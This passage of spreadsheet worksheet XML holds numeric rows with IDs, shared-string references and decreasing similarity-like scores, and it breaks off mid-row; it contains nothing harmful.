    <row r="25332" ht="15.75" customHeight="1">
      <c r="A25332" s="1">
        <v>23237.0</v>
      </c>
      <c r="B25332" s="2">
        <v>5.2971813E7</v>
      </c>
      <c r="C25332" s="2" t="s">
        <v>24367</v>
      </c>
      <c r="D25332" s="2">
        <v>1.0</v>
      </c>
      <c r="E25332" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25332" s="2">
        <v>0.1731481481481482</v>
      </c>
    </row>
    <row r="25333" ht="15.75" customHeight="1">
      <c r="A25333" s="1">
        <v>29994.0</v>
      </c>
      <c r="B25333" s="2">
        <v>3612218.0</v>
      </c>
      <c r="C25333" s="2" t="s">
        <v>24368</v>
      </c>
      <c r="D25333" s="2">
        <v>1.0</v>
      </c>
      <c r="E25333" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25333" s="2">
        <v>0.1731481481481482</v>
      </c>
    </row>
    <row r="25334" ht="15.75" customHeight="1">
      <c r="A25334" s="1">
        <v>1363.0</v>
      </c>
      <c r="B25334" s="2">
        <v>2.5976145E7</v>
      </c>
      <c r="C25334" s="2" t="s">
        <v>24369</v>
      </c>
      <c r="D25334" s="2">
        <v>1.0</v>
      </c>
      <c r="E25334" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25334" s="2">
        <v>0.1731078904991949</v>
      </c>
    </row>
    <row r="25335" ht="15.75" customHeight="1">
      <c r="A25335" s="1">
        <v>20354.0</v>
      </c>
      <c r="B25335" s="2">
        <v>1.1662282E7</v>
      </c>
      <c r="C25335" s="2" t="s">
        <v>24370</v>
      </c>
      <c r="D25335" s="2">
        <v>1.0</v>
      </c>
      <c r="E25335" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25335" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="25336" ht="15.75" customHeight="1">
      <c r="A25336" s="1">
        <v>23451.0</v>
      </c>
      <c r="B25336" s="2">
        <v>5.684148E7</v>
      </c>
      <c r="C25336" s="2" t="s">
        <v>24371</v>
      </c>
      <c r="D25336" s="2">
        <v>1.0</v>
      </c>
      <c r="E25336" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25336" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="25337" ht="15.75" customHeight="1">
      <c r="A25337" s="1">
        <v>23550.0</v>
      </c>
      <c r="B25337" s="2">
        <v>6058383.0</v>
      </c>
      <c r="C25337" s="2" t="s">
        <v>24372</v>
      </c>
      <c r="D25337" s="2">
        <v>1.0</v>
      </c>
      <c r="E25337" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25337" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="25338" ht="15.75" customHeight="1">
      <c r="A25338" s="1">
        <v>24708.0</v>
      </c>
      <c r="B25338" s="2">
        <v>1.1662281E7</v>
      </c>
      <c r="C25338" s="2" t="s">
        <v>24373</v>
      </c>
      <c r="D25338" s="2">
        <v>1.0</v>
      </c>
      <c r="E25338" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25338" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="25339" ht="15.75" customHeight="1">
      <c r="A25339" s="1">
        <v>32469.0</v>
      </c>
      <c r="B25339" s="2">
        <v>5.6841479E7</v>
      </c>
      <c r="C25339" s="2" t="s">
        <v>24371</v>
      </c>
      <c r="D25339" s="2">
        <v>1.0</v>
      </c>
      <c r="E25339" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25339" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="25340" ht="15.75" customHeight="1">
      <c r="A25340" s="1">
        <v>32760.0</v>
      </c>
      <c r="B25340" s="2">
        <v>6058382.0</v>
      </c>
      <c r="C25340" s="2" t="s">
        <v>24372</v>
      </c>
      <c r="D25340" s="2">
        <v>1.0</v>
      </c>
      <c r="E25340" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25340" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="25341" ht="15.75" customHeight="1">
      <c r="A25341" s="1">
        <v>32989.0</v>
      </c>
      <c r="B25341" s="2">
        <v>6603805.0</v>
      </c>
      <c r="C25341" s="2" t="s">
        <v>24374</v>
      </c>
      <c r="D25341" s="2">
        <v>1.0</v>
      </c>
      <c r="E25341" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25341" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="25342" ht="15.75" customHeight="1">
      <c r="A25342" s="1">
        <v>27387.0</v>
      </c>
      <c r="B25342" s="2">
        <v>2.1751555E7</v>
      </c>
      <c r="C25342" s="2" t="s">
        <v>24375</v>
      </c>
      <c r="D25342" s="2">
        <v>1.0</v>
      </c>
      <c r="E25342" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25342" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="25343" ht="15.75" customHeight="1">
      <c r="A25343" s="1">
        <v>22261.0</v>
      </c>
      <c r="B25343" s="2">
        <v>3.2892691E7</v>
      </c>
      <c r="C25343" s="2" t="s">
        <v>24376</v>
      </c>
      <c r="D25343" s="2">
        <v>1.0</v>
      </c>
      <c r="E25343" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25343" s="2">
        <v>0.1714559386973181</v>
      </c>
    </row>
    <row r="25344" ht="15.75" customHeight="1">
      <c r="A25344" s="1">
        <v>22889.0</v>
      </c>
      <c r="B25344" s="2">
        <v>4.7806662E7</v>
      </c>
      <c r="C25344" s="2" t="s">
        <v>24377</v>
      </c>
      <c r="D25344" s="2">
        <v>1.0</v>
      </c>
      <c r="E25344" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25344" s="2">
        <v>0.1714559386973181</v>
      </c>
    </row>
    <row r="25345" ht="15.75" customHeight="1">
      <c r="A25345" s="1">
        <v>33697.0</v>
      </c>
      <c r="B25345" s="2">
        <v>8465360.0</v>
      </c>
      <c r="C25345" s="2" t="s">
        <v>24378</v>
      </c>
      <c r="D25345" s="2">
        <v>1.0</v>
      </c>
      <c r="E25345" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25345" s="2">
        <v>0.1704331450094162</v>
      </c>
    </row>
    <row r="25346" ht="15.75" customHeight="1">
      <c r="A25346" s="1">
        <v>24362.0</v>
      </c>
      <c r="B25346" s="2">
        <v>1.0739806E7</v>
      </c>
      <c r="C25346" s="2" t="s">
        <v>24379</v>
      </c>
      <c r="D25346" s="2">
        <v>1.0</v>
      </c>
      <c r="E25346" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25346" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="25347" ht="15.75" customHeight="1">
      <c r="A25347" s="1">
        <v>24553.0</v>
      </c>
      <c r="B25347" s="2">
        <v>1.1291047E7</v>
      </c>
      <c r="C25347" s="2" t="s">
        <v>24380</v>
      </c>
      <c r="D25347" s="2">
        <v>1.0</v>
      </c>
      <c r="E25347" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25347" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="25348" ht="15.75" customHeight="1">
      <c r="A25348" s="1">
        <v>24358.0</v>
      </c>
      <c r="B25348" s="2">
        <v>1.0739806E7</v>
      </c>
      <c r="C25348" s="2" t="s">
        <v>24381</v>
      </c>
      <c r="D25348" s="2">
        <v>1.0</v>
      </c>
      <c r="E25348" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25348" s="2">
        <v>0.1691919191919192</v>
      </c>
    </row>
    <row r="25349" ht="15.75" customHeight="1">
      <c r="A25349" s="1">
        <v>31223.0</v>
      </c>
      <c r="B25349" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25349" s="2" t="s">
        <v>24382</v>
      </c>
      <c r="D25349" s="2">
        <v>1.0</v>
      </c>
      <c r="E25349" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25349" s="2">
        <v>0.1691919191919192</v>
      </c>
    </row>
    <row r="25350" ht="15.75" customHeight="1">
      <c r="A25350" s="1">
        <v>22805.0</v>
      </c>
      <c r="B25350" s="2">
        <v>4.5809765E7</v>
      </c>
      <c r="C25350" s="2" t="s">
        <v>24383</v>
      </c>
      <c r="D25350" s="2">
        <v>1.0</v>
      </c>
      <c r="E25350" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25350" s="2">
        <v>0.1682769726247987</v>
      </c>
    </row>
    <row r="25351" ht="15.75" customHeight="1">
      <c r="A25351" s="1">
        <v>5945.0</v>
      </c>
      <c r="B25351" s="2">
        <v>4.7277072E7</v>
      </c>
      <c r="C25351" s="2" t="s">
        <v>24384</v>
      </c>
      <c r="D25351" s="2">
        <v>1.0</v>
      </c>
      <c r="E25351" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25351" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="25352" ht="15.75" customHeight="1">
      <c r="A25352" s="1">
        <v>13574.0</v>
      </c>
      <c r="B25352" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C25352" s="2" t="s">
        <v>24385</v>
      </c>
      <c r="D25352" s="2">
        <v>1.0</v>
      </c>
      <c r="E25352" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25352" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="25353" ht="15.75" customHeight="1">
      <c r="A25353" s="1">
        <v>20239.0</v>
      </c>
      <c r="B25353" s="2">
        <v>1.0856056E7</v>
      </c>
      <c r="C25353" s="2" t="s">
        <v>24386</v>
      </c>
      <c r="D25353" s="2">
        <v>1.0</v>
      </c>
      <c r="E25353" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25353" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="25354" ht="15.75" customHeight="1">
      <c r="A25354" s="1">
        <v>29997.0</v>
      </c>
      <c r="B25354" s="2">
        <v>3612218.0</v>
      </c>
      <c r="C25354" s="2" t="s">
        <v>24387</v>
      </c>
      <c r="D25354" s="2">
        <v>1.0</v>
      </c>
      <c r="E25354" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25354" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="25355" ht="15.75" customHeight="1">
      <c r="A25355" s="1">
        <v>33391.0</v>
      </c>
      <c r="B25355" s="2">
        <v>7686751.0</v>
      </c>
      <c r="C25355" s="2" t="s">
        <v>24388</v>
      </c>
      <c r="D25355" s="2">
        <v>1.0</v>
      </c>
      <c r="E25355" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25355" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="25356" ht="15.75" customHeight="1">
      <c r="A25356" s="1">
        <v>24432.0</v>
      </c>
      <c r="B25356" s="2">
        <v>1.0856055E7</v>
      </c>
      <c r="C25356" s="2" t="s">
        <v>24389</v>
      </c>
      <c r="D25356" s="2">
        <v>1.0</v>
      </c>
      <c r="E25356" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25356" s="2">
        <v>0.1657407407407407</v>
      </c>
    </row>
    <row r="25357" ht="15.75" customHeight="1">
      <c r="A25357" s="1">
        <v>33889.0</v>
      </c>
      <c r="B25357" s="2">
        <v>9173246.0</v>
      </c>
      <c r="C25357" s="2" t="s">
        <v>24390</v>
      </c>
      <c r="D25357" s="2">
        <v>1.0</v>
      </c>
      <c r="E25357" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25357" s="2">
        <v>0.1650563607085347</v>
      </c>
    </row>
    <row r="25358" ht="15.75" customHeight="1">
      <c r="A25358" s="1">
        <v>32684.0</v>
      </c>
      <c r="B25358" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C25358" s="2" t="s">
        <v>24391</v>
      </c>
      <c r="D25358" s="2">
        <v>1.0</v>
      </c>
      <c r="E25358" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25358" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="25359" ht="15.75" customHeight="1">
      <c r="A25359" s="1">
        <v>33588.0</v>
      </c>
      <c r="B25359" s="2">
        <v>8325752.0</v>
      </c>
      <c r="C25359" s="2" t="s">
        <v>24392</v>
      </c>
      <c r="D25359" s="2">
        <v>1.0</v>
      </c>
      <c r="E25359" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25359" s="2">
        <v>0.164783427495292</v>
      </c>
    </row>
    <row r="25360" ht="15.75" customHeight="1">
      <c r="A25360" s="1">
        <v>34248.0</v>
      </c>
      <c r="B25360" s="2">
        <v>4.924416E7</v>
      </c>
      <c r="C25360" s="2" t="s">
        <v>24393</v>
      </c>
      <c r="D25360" s="2">
        <v>1.0</v>
      </c>
      <c r="E25360" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25360" s="2">
        <v>0.1647173489278753</v>
      </c>
    </row>
    <row r="25361" ht="15.75" customHeight="1">
      <c r="A25361" s="1">
        <v>9774.0</v>
      </c>
      <c r="B25361" s="2">
        <v>5.6506632E7</v>
      </c>
      <c r="C25361" s="2" t="s">
        <v>24394</v>
      </c>
      <c r="D25361" s="2">
        <v>1.0</v>
      </c>
      <c r="E25361" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25361" s="2">
        <v>0.1646464646464647</v>
      </c>
    </row>
    <row r="25362" ht="15.75" customHeight="1">
      <c r="A25362" s="1">
        <v>26234.0</v>
      </c>
      <c r="B25362" s="2">
        <v>1.6282675E7</v>
      </c>
      <c r="C25362" s="2" t="s">
        <v>24395</v>
      </c>
      <c r="D25362" s="2">
        <v>1.0</v>
      </c>
      <c r="E25362" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25362" s="2">
        <v>0.1646464646464647</v>
      </c>
    </row>
    <row r="25363" ht="15.75" customHeight="1">
      <c r="A25363" s="1">
        <v>31582.0</v>
      </c>
      <c r="B25363" s="2">
        <v>5.1270587E7</v>
      </c>
      <c r="C25363" s="2" t="s">
        <v>24396</v>
      </c>
      <c r="D25363" s="2">
        <v>1.0</v>
      </c>
      <c r="E25363" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25363" s="2">
        <v>0.1646464646464647</v>
      </c>
    </row>
    <row r="25364" ht="15.75" customHeight="1">
      <c r="A25364" s="1">
        <v>32256.0</v>
      </c>
      <c r="B25364" s="2">
        <v>5.5099953E7</v>
      </c>
      <c r="C25364" s="2" t="s">
        <v>24397</v>
      </c>
      <c r="D25364" s="2">
        <v>1.0</v>
      </c>
      <c r="E25364" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25364" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="25365" ht="15.75" customHeight="1">
      <c r="A25365" s="1">
        <v>635.0</v>
      </c>
      <c r="B25365" s="2">
        <v>1.970217E7</v>
      </c>
      <c r="C25365" s="2" t="s">
        <v>24398</v>
      </c>
      <c r="D25365" s="2">
        <v>1.0</v>
      </c>
      <c r="E25365" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25365" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="25366" ht="15.75" customHeight="1">
      <c r="A25366" s="1">
        <v>23487.0</v>
      </c>
      <c r="B25366" s="2">
        <v>5739952.0</v>
      </c>
      <c r="C25366" s="2" t="s">
        <v>24399</v>
      </c>
      <c r="D25366" s="2">
        <v>1.0</v>
      </c>
      <c r="E25366" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25366" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="25367" ht="15.75" customHeight="1">
      <c r="A25367" s="1">
        <v>24433.0</v>
      </c>
      <c r="B25367" s="2">
        <v>1.0856055E7</v>
      </c>
      <c r="C25367" s="2" t="s">
        <v>24400</v>
      </c>
      <c r="D25367" s="2">
        <v>1.0</v>
      </c>
      <c r="E25367" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25367" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="25368" ht="15.75" customHeight="1">
      <c r="A25368" s="1">
        <v>25753.0</v>
      </c>
      <c r="B25368" s="2">
        <v>1.4600582E7</v>
      </c>
      <c r="C25368" s="2" t="s">
        <v>24401</v>
      </c>
      <c r="D25368" s="2">
        <v>1.0</v>
      </c>
      <c r="E25368" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25368" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="25369" ht="15.75" customHeight="1">
      <c r="A25369" s="1">
        <v>23450.0</v>
      </c>
      <c r="B25369" s="2">
        <v>5.6835351E7</v>
      </c>
      <c r="C25369" s="2" t="s">
        <v>24402</v>
      </c>
      <c r="D25369" s="2">
        <v>1.0</v>
      </c>
      <c r="E25369" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25369" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="25370" ht="15.75" customHeight="1">
      <c r="A25370" s="1">
        <v>32539.0</v>
      </c>
      <c r="B25370" s="2">
        <v>5739951.0</v>
      </c>
      <c r="C25370" s="2" t="s">
        <v>24403</v>
      </c>
      <c r="D25370" s="2">
        <v>1.0</v>
      </c>
      <c r="E25370" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25370" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="25371" ht="15.75" customHeight="1">
      <c r="A25371" s="1">
        <v>3366.0</v>
      </c>
      <c r="B25371" s="2">
        <v>3.7895956E7</v>
      </c>
      <c r="C25371" s="2" t="s">
        <v>24404</v>
      </c>
      <c r="D25371" s="2">
        <v>1.0</v>
      </c>
      <c r="E25371" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25371" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="25372" ht="15.75" customHeight="1">
      <c r="A25372" s="1">
        <v>24431.0</v>
      </c>
      <c r="B25372" s="2">
        <v>1.0856055E7</v>
      </c>
      <c r="C25372" s="2" t="s">
        <v>24386</v>
      </c>
      <c r="D25372" s="2">
        <v>1.0</v>
      </c>
      <c r="E25372" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25372" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="25373" ht="15.75" customHeight="1">
      <c r="A25373" s="1">
        <v>22243.0</v>
      </c>
      <c r="B25373" s="2">
        <v>3.2728221E7</v>
      </c>
      <c r="C25373" s="2" t="s">
        <v>24405</v>
      </c>
      <c r="D25373" s="2">
        <v>1.0</v>
      </c>
      <c r="E25373" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25373" s="2">
        <v>0.1629001883239172</v>
      </c>
    </row>
    <row r="25374" ht="15.75" customHeight="1">
      <c r="A25374" s="1">
        <v>23308.0</v>
      </c>
      <c r="B25374" s="2">
        <v>5.4124276E7</v>
      </c>
      <c r="C25374" s="2" t="s">
        <v>24406</v>
      </c>
      <c r="D25374" s="2">
        <v>1.0</v>
      </c>
      <c r="E25374" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25374" s="2">
        <v>0.1628086419753087</v>
      </c>
    </row>
    <row r="25375" ht="15.75" customHeight="1">
      <c r="A25375" s="1">
        <v>27491.0</v>
      </c>
      <c r="B25375" s="2">
        <v>2.2041813E7</v>
      </c>
      <c r="C25375" s="2" t="s">
        <v>24407</v>
      </c>
      <c r="D25375" s="2">
        <v>1.0</v>
      </c>
      <c r="E25375" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25375" s="2">
        <v>0.1615646258503402</v>
      </c>
    </row>
    <row r="25376" ht="15.75" customHeight="1">
      <c r="A25376" s="1">
        <v>3140.0</v>
      </c>
      <c r="B25376" s="2">
        <v>3.6904875E7</v>
      </c>
      <c r="C25376" s="2" t="s">
        <v>24408</v>
      </c>
      <c r="D25376" s="2">
        <v>1.0</v>
      </c>
      <c r="E25376" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25376" s="2">
        <v>0.1614114114114114</v>
      </c>
    </row>
    <row r="25377" ht="15.75" customHeight="1">
      <c r="A25377" s="1">
        <v>5996.0</v>
      </c>
      <c r="B25377" s="2">
        <v>4.7452662E7</v>
      </c>
      <c r="C25377" s="2" t="s">
        <v>24409</v>
      </c>
      <c r="D25377" s="2">
        <v>1.0</v>
      </c>
      <c r="E25377" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25377" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="25378" ht="15.75" customHeight="1">
      <c r="A25378" s="1">
        <v>19509.0</v>
      </c>
      <c r="B25378" s="2">
        <v>5.5927641E7</v>
      </c>
      <c r="C25378" s="2" t="s">
        <v>24410</v>
      </c>
      <c r="D25378" s="2">
        <v>1.0</v>
      </c>
      <c r="E25378" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25378" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="25379" ht="15.75" customHeight="1">
      <c r="A25379" s="1">
        <v>28915.0</v>
      </c>
      <c r="B25379" s="2">
        <v>2.947186E7</v>
      </c>
      <c r="C25379" s="2" t="s">
        <v>24411</v>
      </c>
      <c r="D25379" s="2">
        <v>1.0</v>
      </c>
      <c r="E25379" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25379" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="25380" ht="15.75" customHeight="1">
      <c r="A25380" s="1">
        <v>31166.0</v>
      </c>
      <c r="B25380" s="2">
        <v>4903910.0</v>
      </c>
      <c r="C25380" s="2" t="s">
        <v>24412</v>
      </c>
      <c r="D25380" s="2">
        <v>1.0</v>
      </c>
      <c r="E25380" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25380" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="25381" ht="15.75" customHeight="1">
      <c r="A25381" s="1">
        <v>4052.0</v>
      </c>
      <c r="B25381" s="2">
        <v>4.1105165E7</v>
      </c>
      <c r="C25381" s="2" t="s">
        <v>24413</v>
      </c>
      <c r="D25381" s="2">
        <v>1.0</v>
      </c>
      <c r="E25381" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25381" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="25382" ht="15.75" customHeight="1">
      <c r="A25382" s="1">
        <v>20710.0</v>
      </c>
      <c r="B25382" s="2">
        <v>1.4566783E7</v>
      </c>
      <c r="C25382" s="2" t="s">
        <v>24414</v>
      </c>
      <c r="D25382" s="2">
        <v>1.0</v>
      </c>
      <c r="E25382" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25382" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="25383" ht="15.75" customHeight="1">
      <c r="A25383" s="1">
        <v>31546.0</v>
      </c>
      <c r="B25383" s="2">
        <v>5111721.0</v>
      </c>
      <c r="C25383" s="2" t="s">
        <v>24415</v>
      </c>
      <c r="D25383" s="2">
        <v>1.0</v>
      </c>
      <c r="E25383" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25383" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="25384" ht="15.75" customHeight="1">
      <c r="A25384" s="1">
        <v>24800.0</v>
      </c>
      <c r="B25384" s="2">
        <v>1.2012501E7</v>
      </c>
      <c r="C25384" s="2" t="s">
        <v>24416</v>
      </c>
      <c r="D25384" s="2">
        <v>1.0</v>
      </c>
      <c r="E25384" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25384" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="25385" ht="15.75" customHeight="1">
      <c r="A25385" s="1">
        <v>21418.0</v>
      </c>
      <c r="B25385" s="2">
        <v>2.1989827E7</v>
      </c>
      <c r="C25385" s="2" t="s">
        <v>24417</v>
      </c>
      <c r="D25385" s="2">
        <v>1.0</v>
      </c>
      <c r="E25385" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25385" s="2">
        <v>0.1599616858237549</v>
      </c>
    </row>
    <row r="25386" ht="15.75" customHeight="1">
      <c r="A25386" s="1">
        <v>6001.0</v>
      </c>
      <c r="B25386" s="2">
        <v>4.7459817E7</v>
      </c>
      <c r="C25386" s="2" t="s">
        <v>24418</v>
      </c>
      <c r="D25386" s="2">
        <v>1.0</v>
      </c>
      <c r="E25386" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25386" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="25387" ht="15.75" customHeight="1">
      <c r="A25387" s="1">
        <v>21589.0</v>
      </c>
      <c r="B25387" s="2">
        <v>2.3928197E7</v>
      </c>
      <c r="C25387" s="2" t="s">
        <v>24419</v>
      </c>
      <c r="D25387" s="2">
        <v>1.0</v>
      </c>
      <c r="E25387" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25387" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="25388" ht="15.75" customHeight="1">
      <c r="A25388" s="1">
        <v>31655.0</v>
      </c>
      <c r="B25388" s="2">
        <v>5.1645268E7</v>
      </c>
      <c r="C25388" s="2" t="s">
        <v>24420</v>
      </c>
      <c r="D25388" s="2">
        <v>1.0</v>
      </c>
      <c r="E25388" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25388" s="2">
        <v>0.1594516594516595</v>
      </c>
    </row>
    <row r="25389" ht="15.75" customHeight="1">
      <c r="A25389" s="1">
        <v>22888.0</v>
      </c>
      <c r="B25389" s="2">
        <v>4.7806597E7</v>
      </c>
      <c r="C25389" s="2" t="s">
        <v>24421</v>
      </c>
      <c r="D25389" s="2">
        <v>1.0</v>
      </c>
      <c r="E25389" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25389" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="25390" ht="15.75" customHeight="1">
      <c r="A25390" s="1">
        <v>23989.0</v>
      </c>
      <c r="B25390" s="2">
        <v>9173247.0</v>
      </c>
      <c r="C25390" s="2" t="s">
        <v>24422</v>
      </c>
      <c r="D25390" s="2">
        <v>1.0</v>
      </c>
      <c r="E25390" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25390" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="25391" ht="15.75" customHeight="1">
      <c r="A25391" s="1">
        <v>8767.0</v>
      </c>
      <c r="B25391" s="2">
        <v>5.4583818E7</v>
      </c>
      <c r="C25391" s="2" t="s">
        <v>24423</v>
      </c>
      <c r="D25391" s="2">
        <v>1.0</v>
      </c>
      <c r="E25391" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25391" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="25392" ht="15.75" customHeight="1">
      <c r="A25392" s="1">
        <v>23737.0</v>
      </c>
      <c r="B25392" s="2">
        <v>7325140.0</v>
      </c>
      <c r="C25392" s="2" t="s">
        <v>24424</v>
      </c>
      <c r="D25392" s="2">
        <v>1.0</v>
      </c>
      <c r="E25392" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25392" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="25393" ht="15.75" customHeight="1">
      <c r="A25393" s="1">
        <v>32462.0</v>
      </c>
      <c r="B25393" s="2">
        <v>5677597.0</v>
      </c>
      <c r="C25393" s="2" t="s">
        <v>24425</v>
      </c>
      <c r="D25393" s="2">
        <v>1.0</v>
      </c>
      <c r="E25393" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25393" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="25394" ht="15.75" customHeight="1">
      <c r="A25394" s="1">
        <v>29862.0</v>
      </c>
      <c r="B25394" s="2">
        <v>3.5832049E7</v>
      </c>
      <c r="C25394" s="2" t="s">
        <v>24426</v>
      </c>
      <c r="D25394" s="2">
        <v>1.0</v>
      </c>
      <c r="E25394" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25394" s="2">
        <v>0.1586257309941521</v>
      </c>
    </row>
    <row r="25395" ht="15.75" customHeight="1">
      <c r="A25395" s="1">
        <v>10828.0</v>
      </c>
      <c r="B25395" s="2">
        <v>1.5984964E7</v>
      </c>
      <c r="C25395" s="2" t="s">
        <v>24427</v>
      </c>
      <c r="D25395" s="2">
        <v>1.0</v>
      </c>
      <c r="E25395" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25395" s="2">
        <v>0.1586151368760065</v>
      </c>
    </row>
    <row r="25396" ht="15.75" customHeight="1">
      <c r="A25396" s="1">
        <v>32638.0</v>
      </c>
      <c r="B25396" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C25396" s="2" t="s">
        <v>24428</v>
      </c>
      <c r="D25396" s="2">
        <v>1.0</v>
      </c>
      <c r="E25396" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25396" s="2">
        <v>0.158374792703151</v>
      </c>
    </row>
    <row r="25397" ht="15.75" customHeight="1">
      <c r="A25397" s="1">
        <v>17467.0</v>
      </c>
      <c r="B25397" s="2">
        <v>4.9878183E7</v>
      </c>
      <c r="C25397" s="2" t="s">
        <v>24429</v>
      </c>
      <c r="D25397" s="2">
        <v>1.0</v>
      </c>
      <c r="E25397" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25397" s="2">
        <v>0.1581196581196582</v>
      </c>
    </row>
    <row r="25398" ht="15.75" customHeight="1">
      <c r="A25398" s="1">
        <v>28007.0</v>
      </c>
      <c r="B25398" s="2">
        <v>2.4335313E7</v>
      </c>
      <c r="C25398" s="2" t="s">
        <v>24430</v>
      </c>
      <c r="D25398" s="2">
        <v>1.0</v>
      </c>
      <c r="E25398" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25398" s="2">
        <v>0.1581196581196582</v>
      </c>
    </row>
    <row r="25399" ht="15.75" customHeight="1">
      <c r="A25399" s="1">
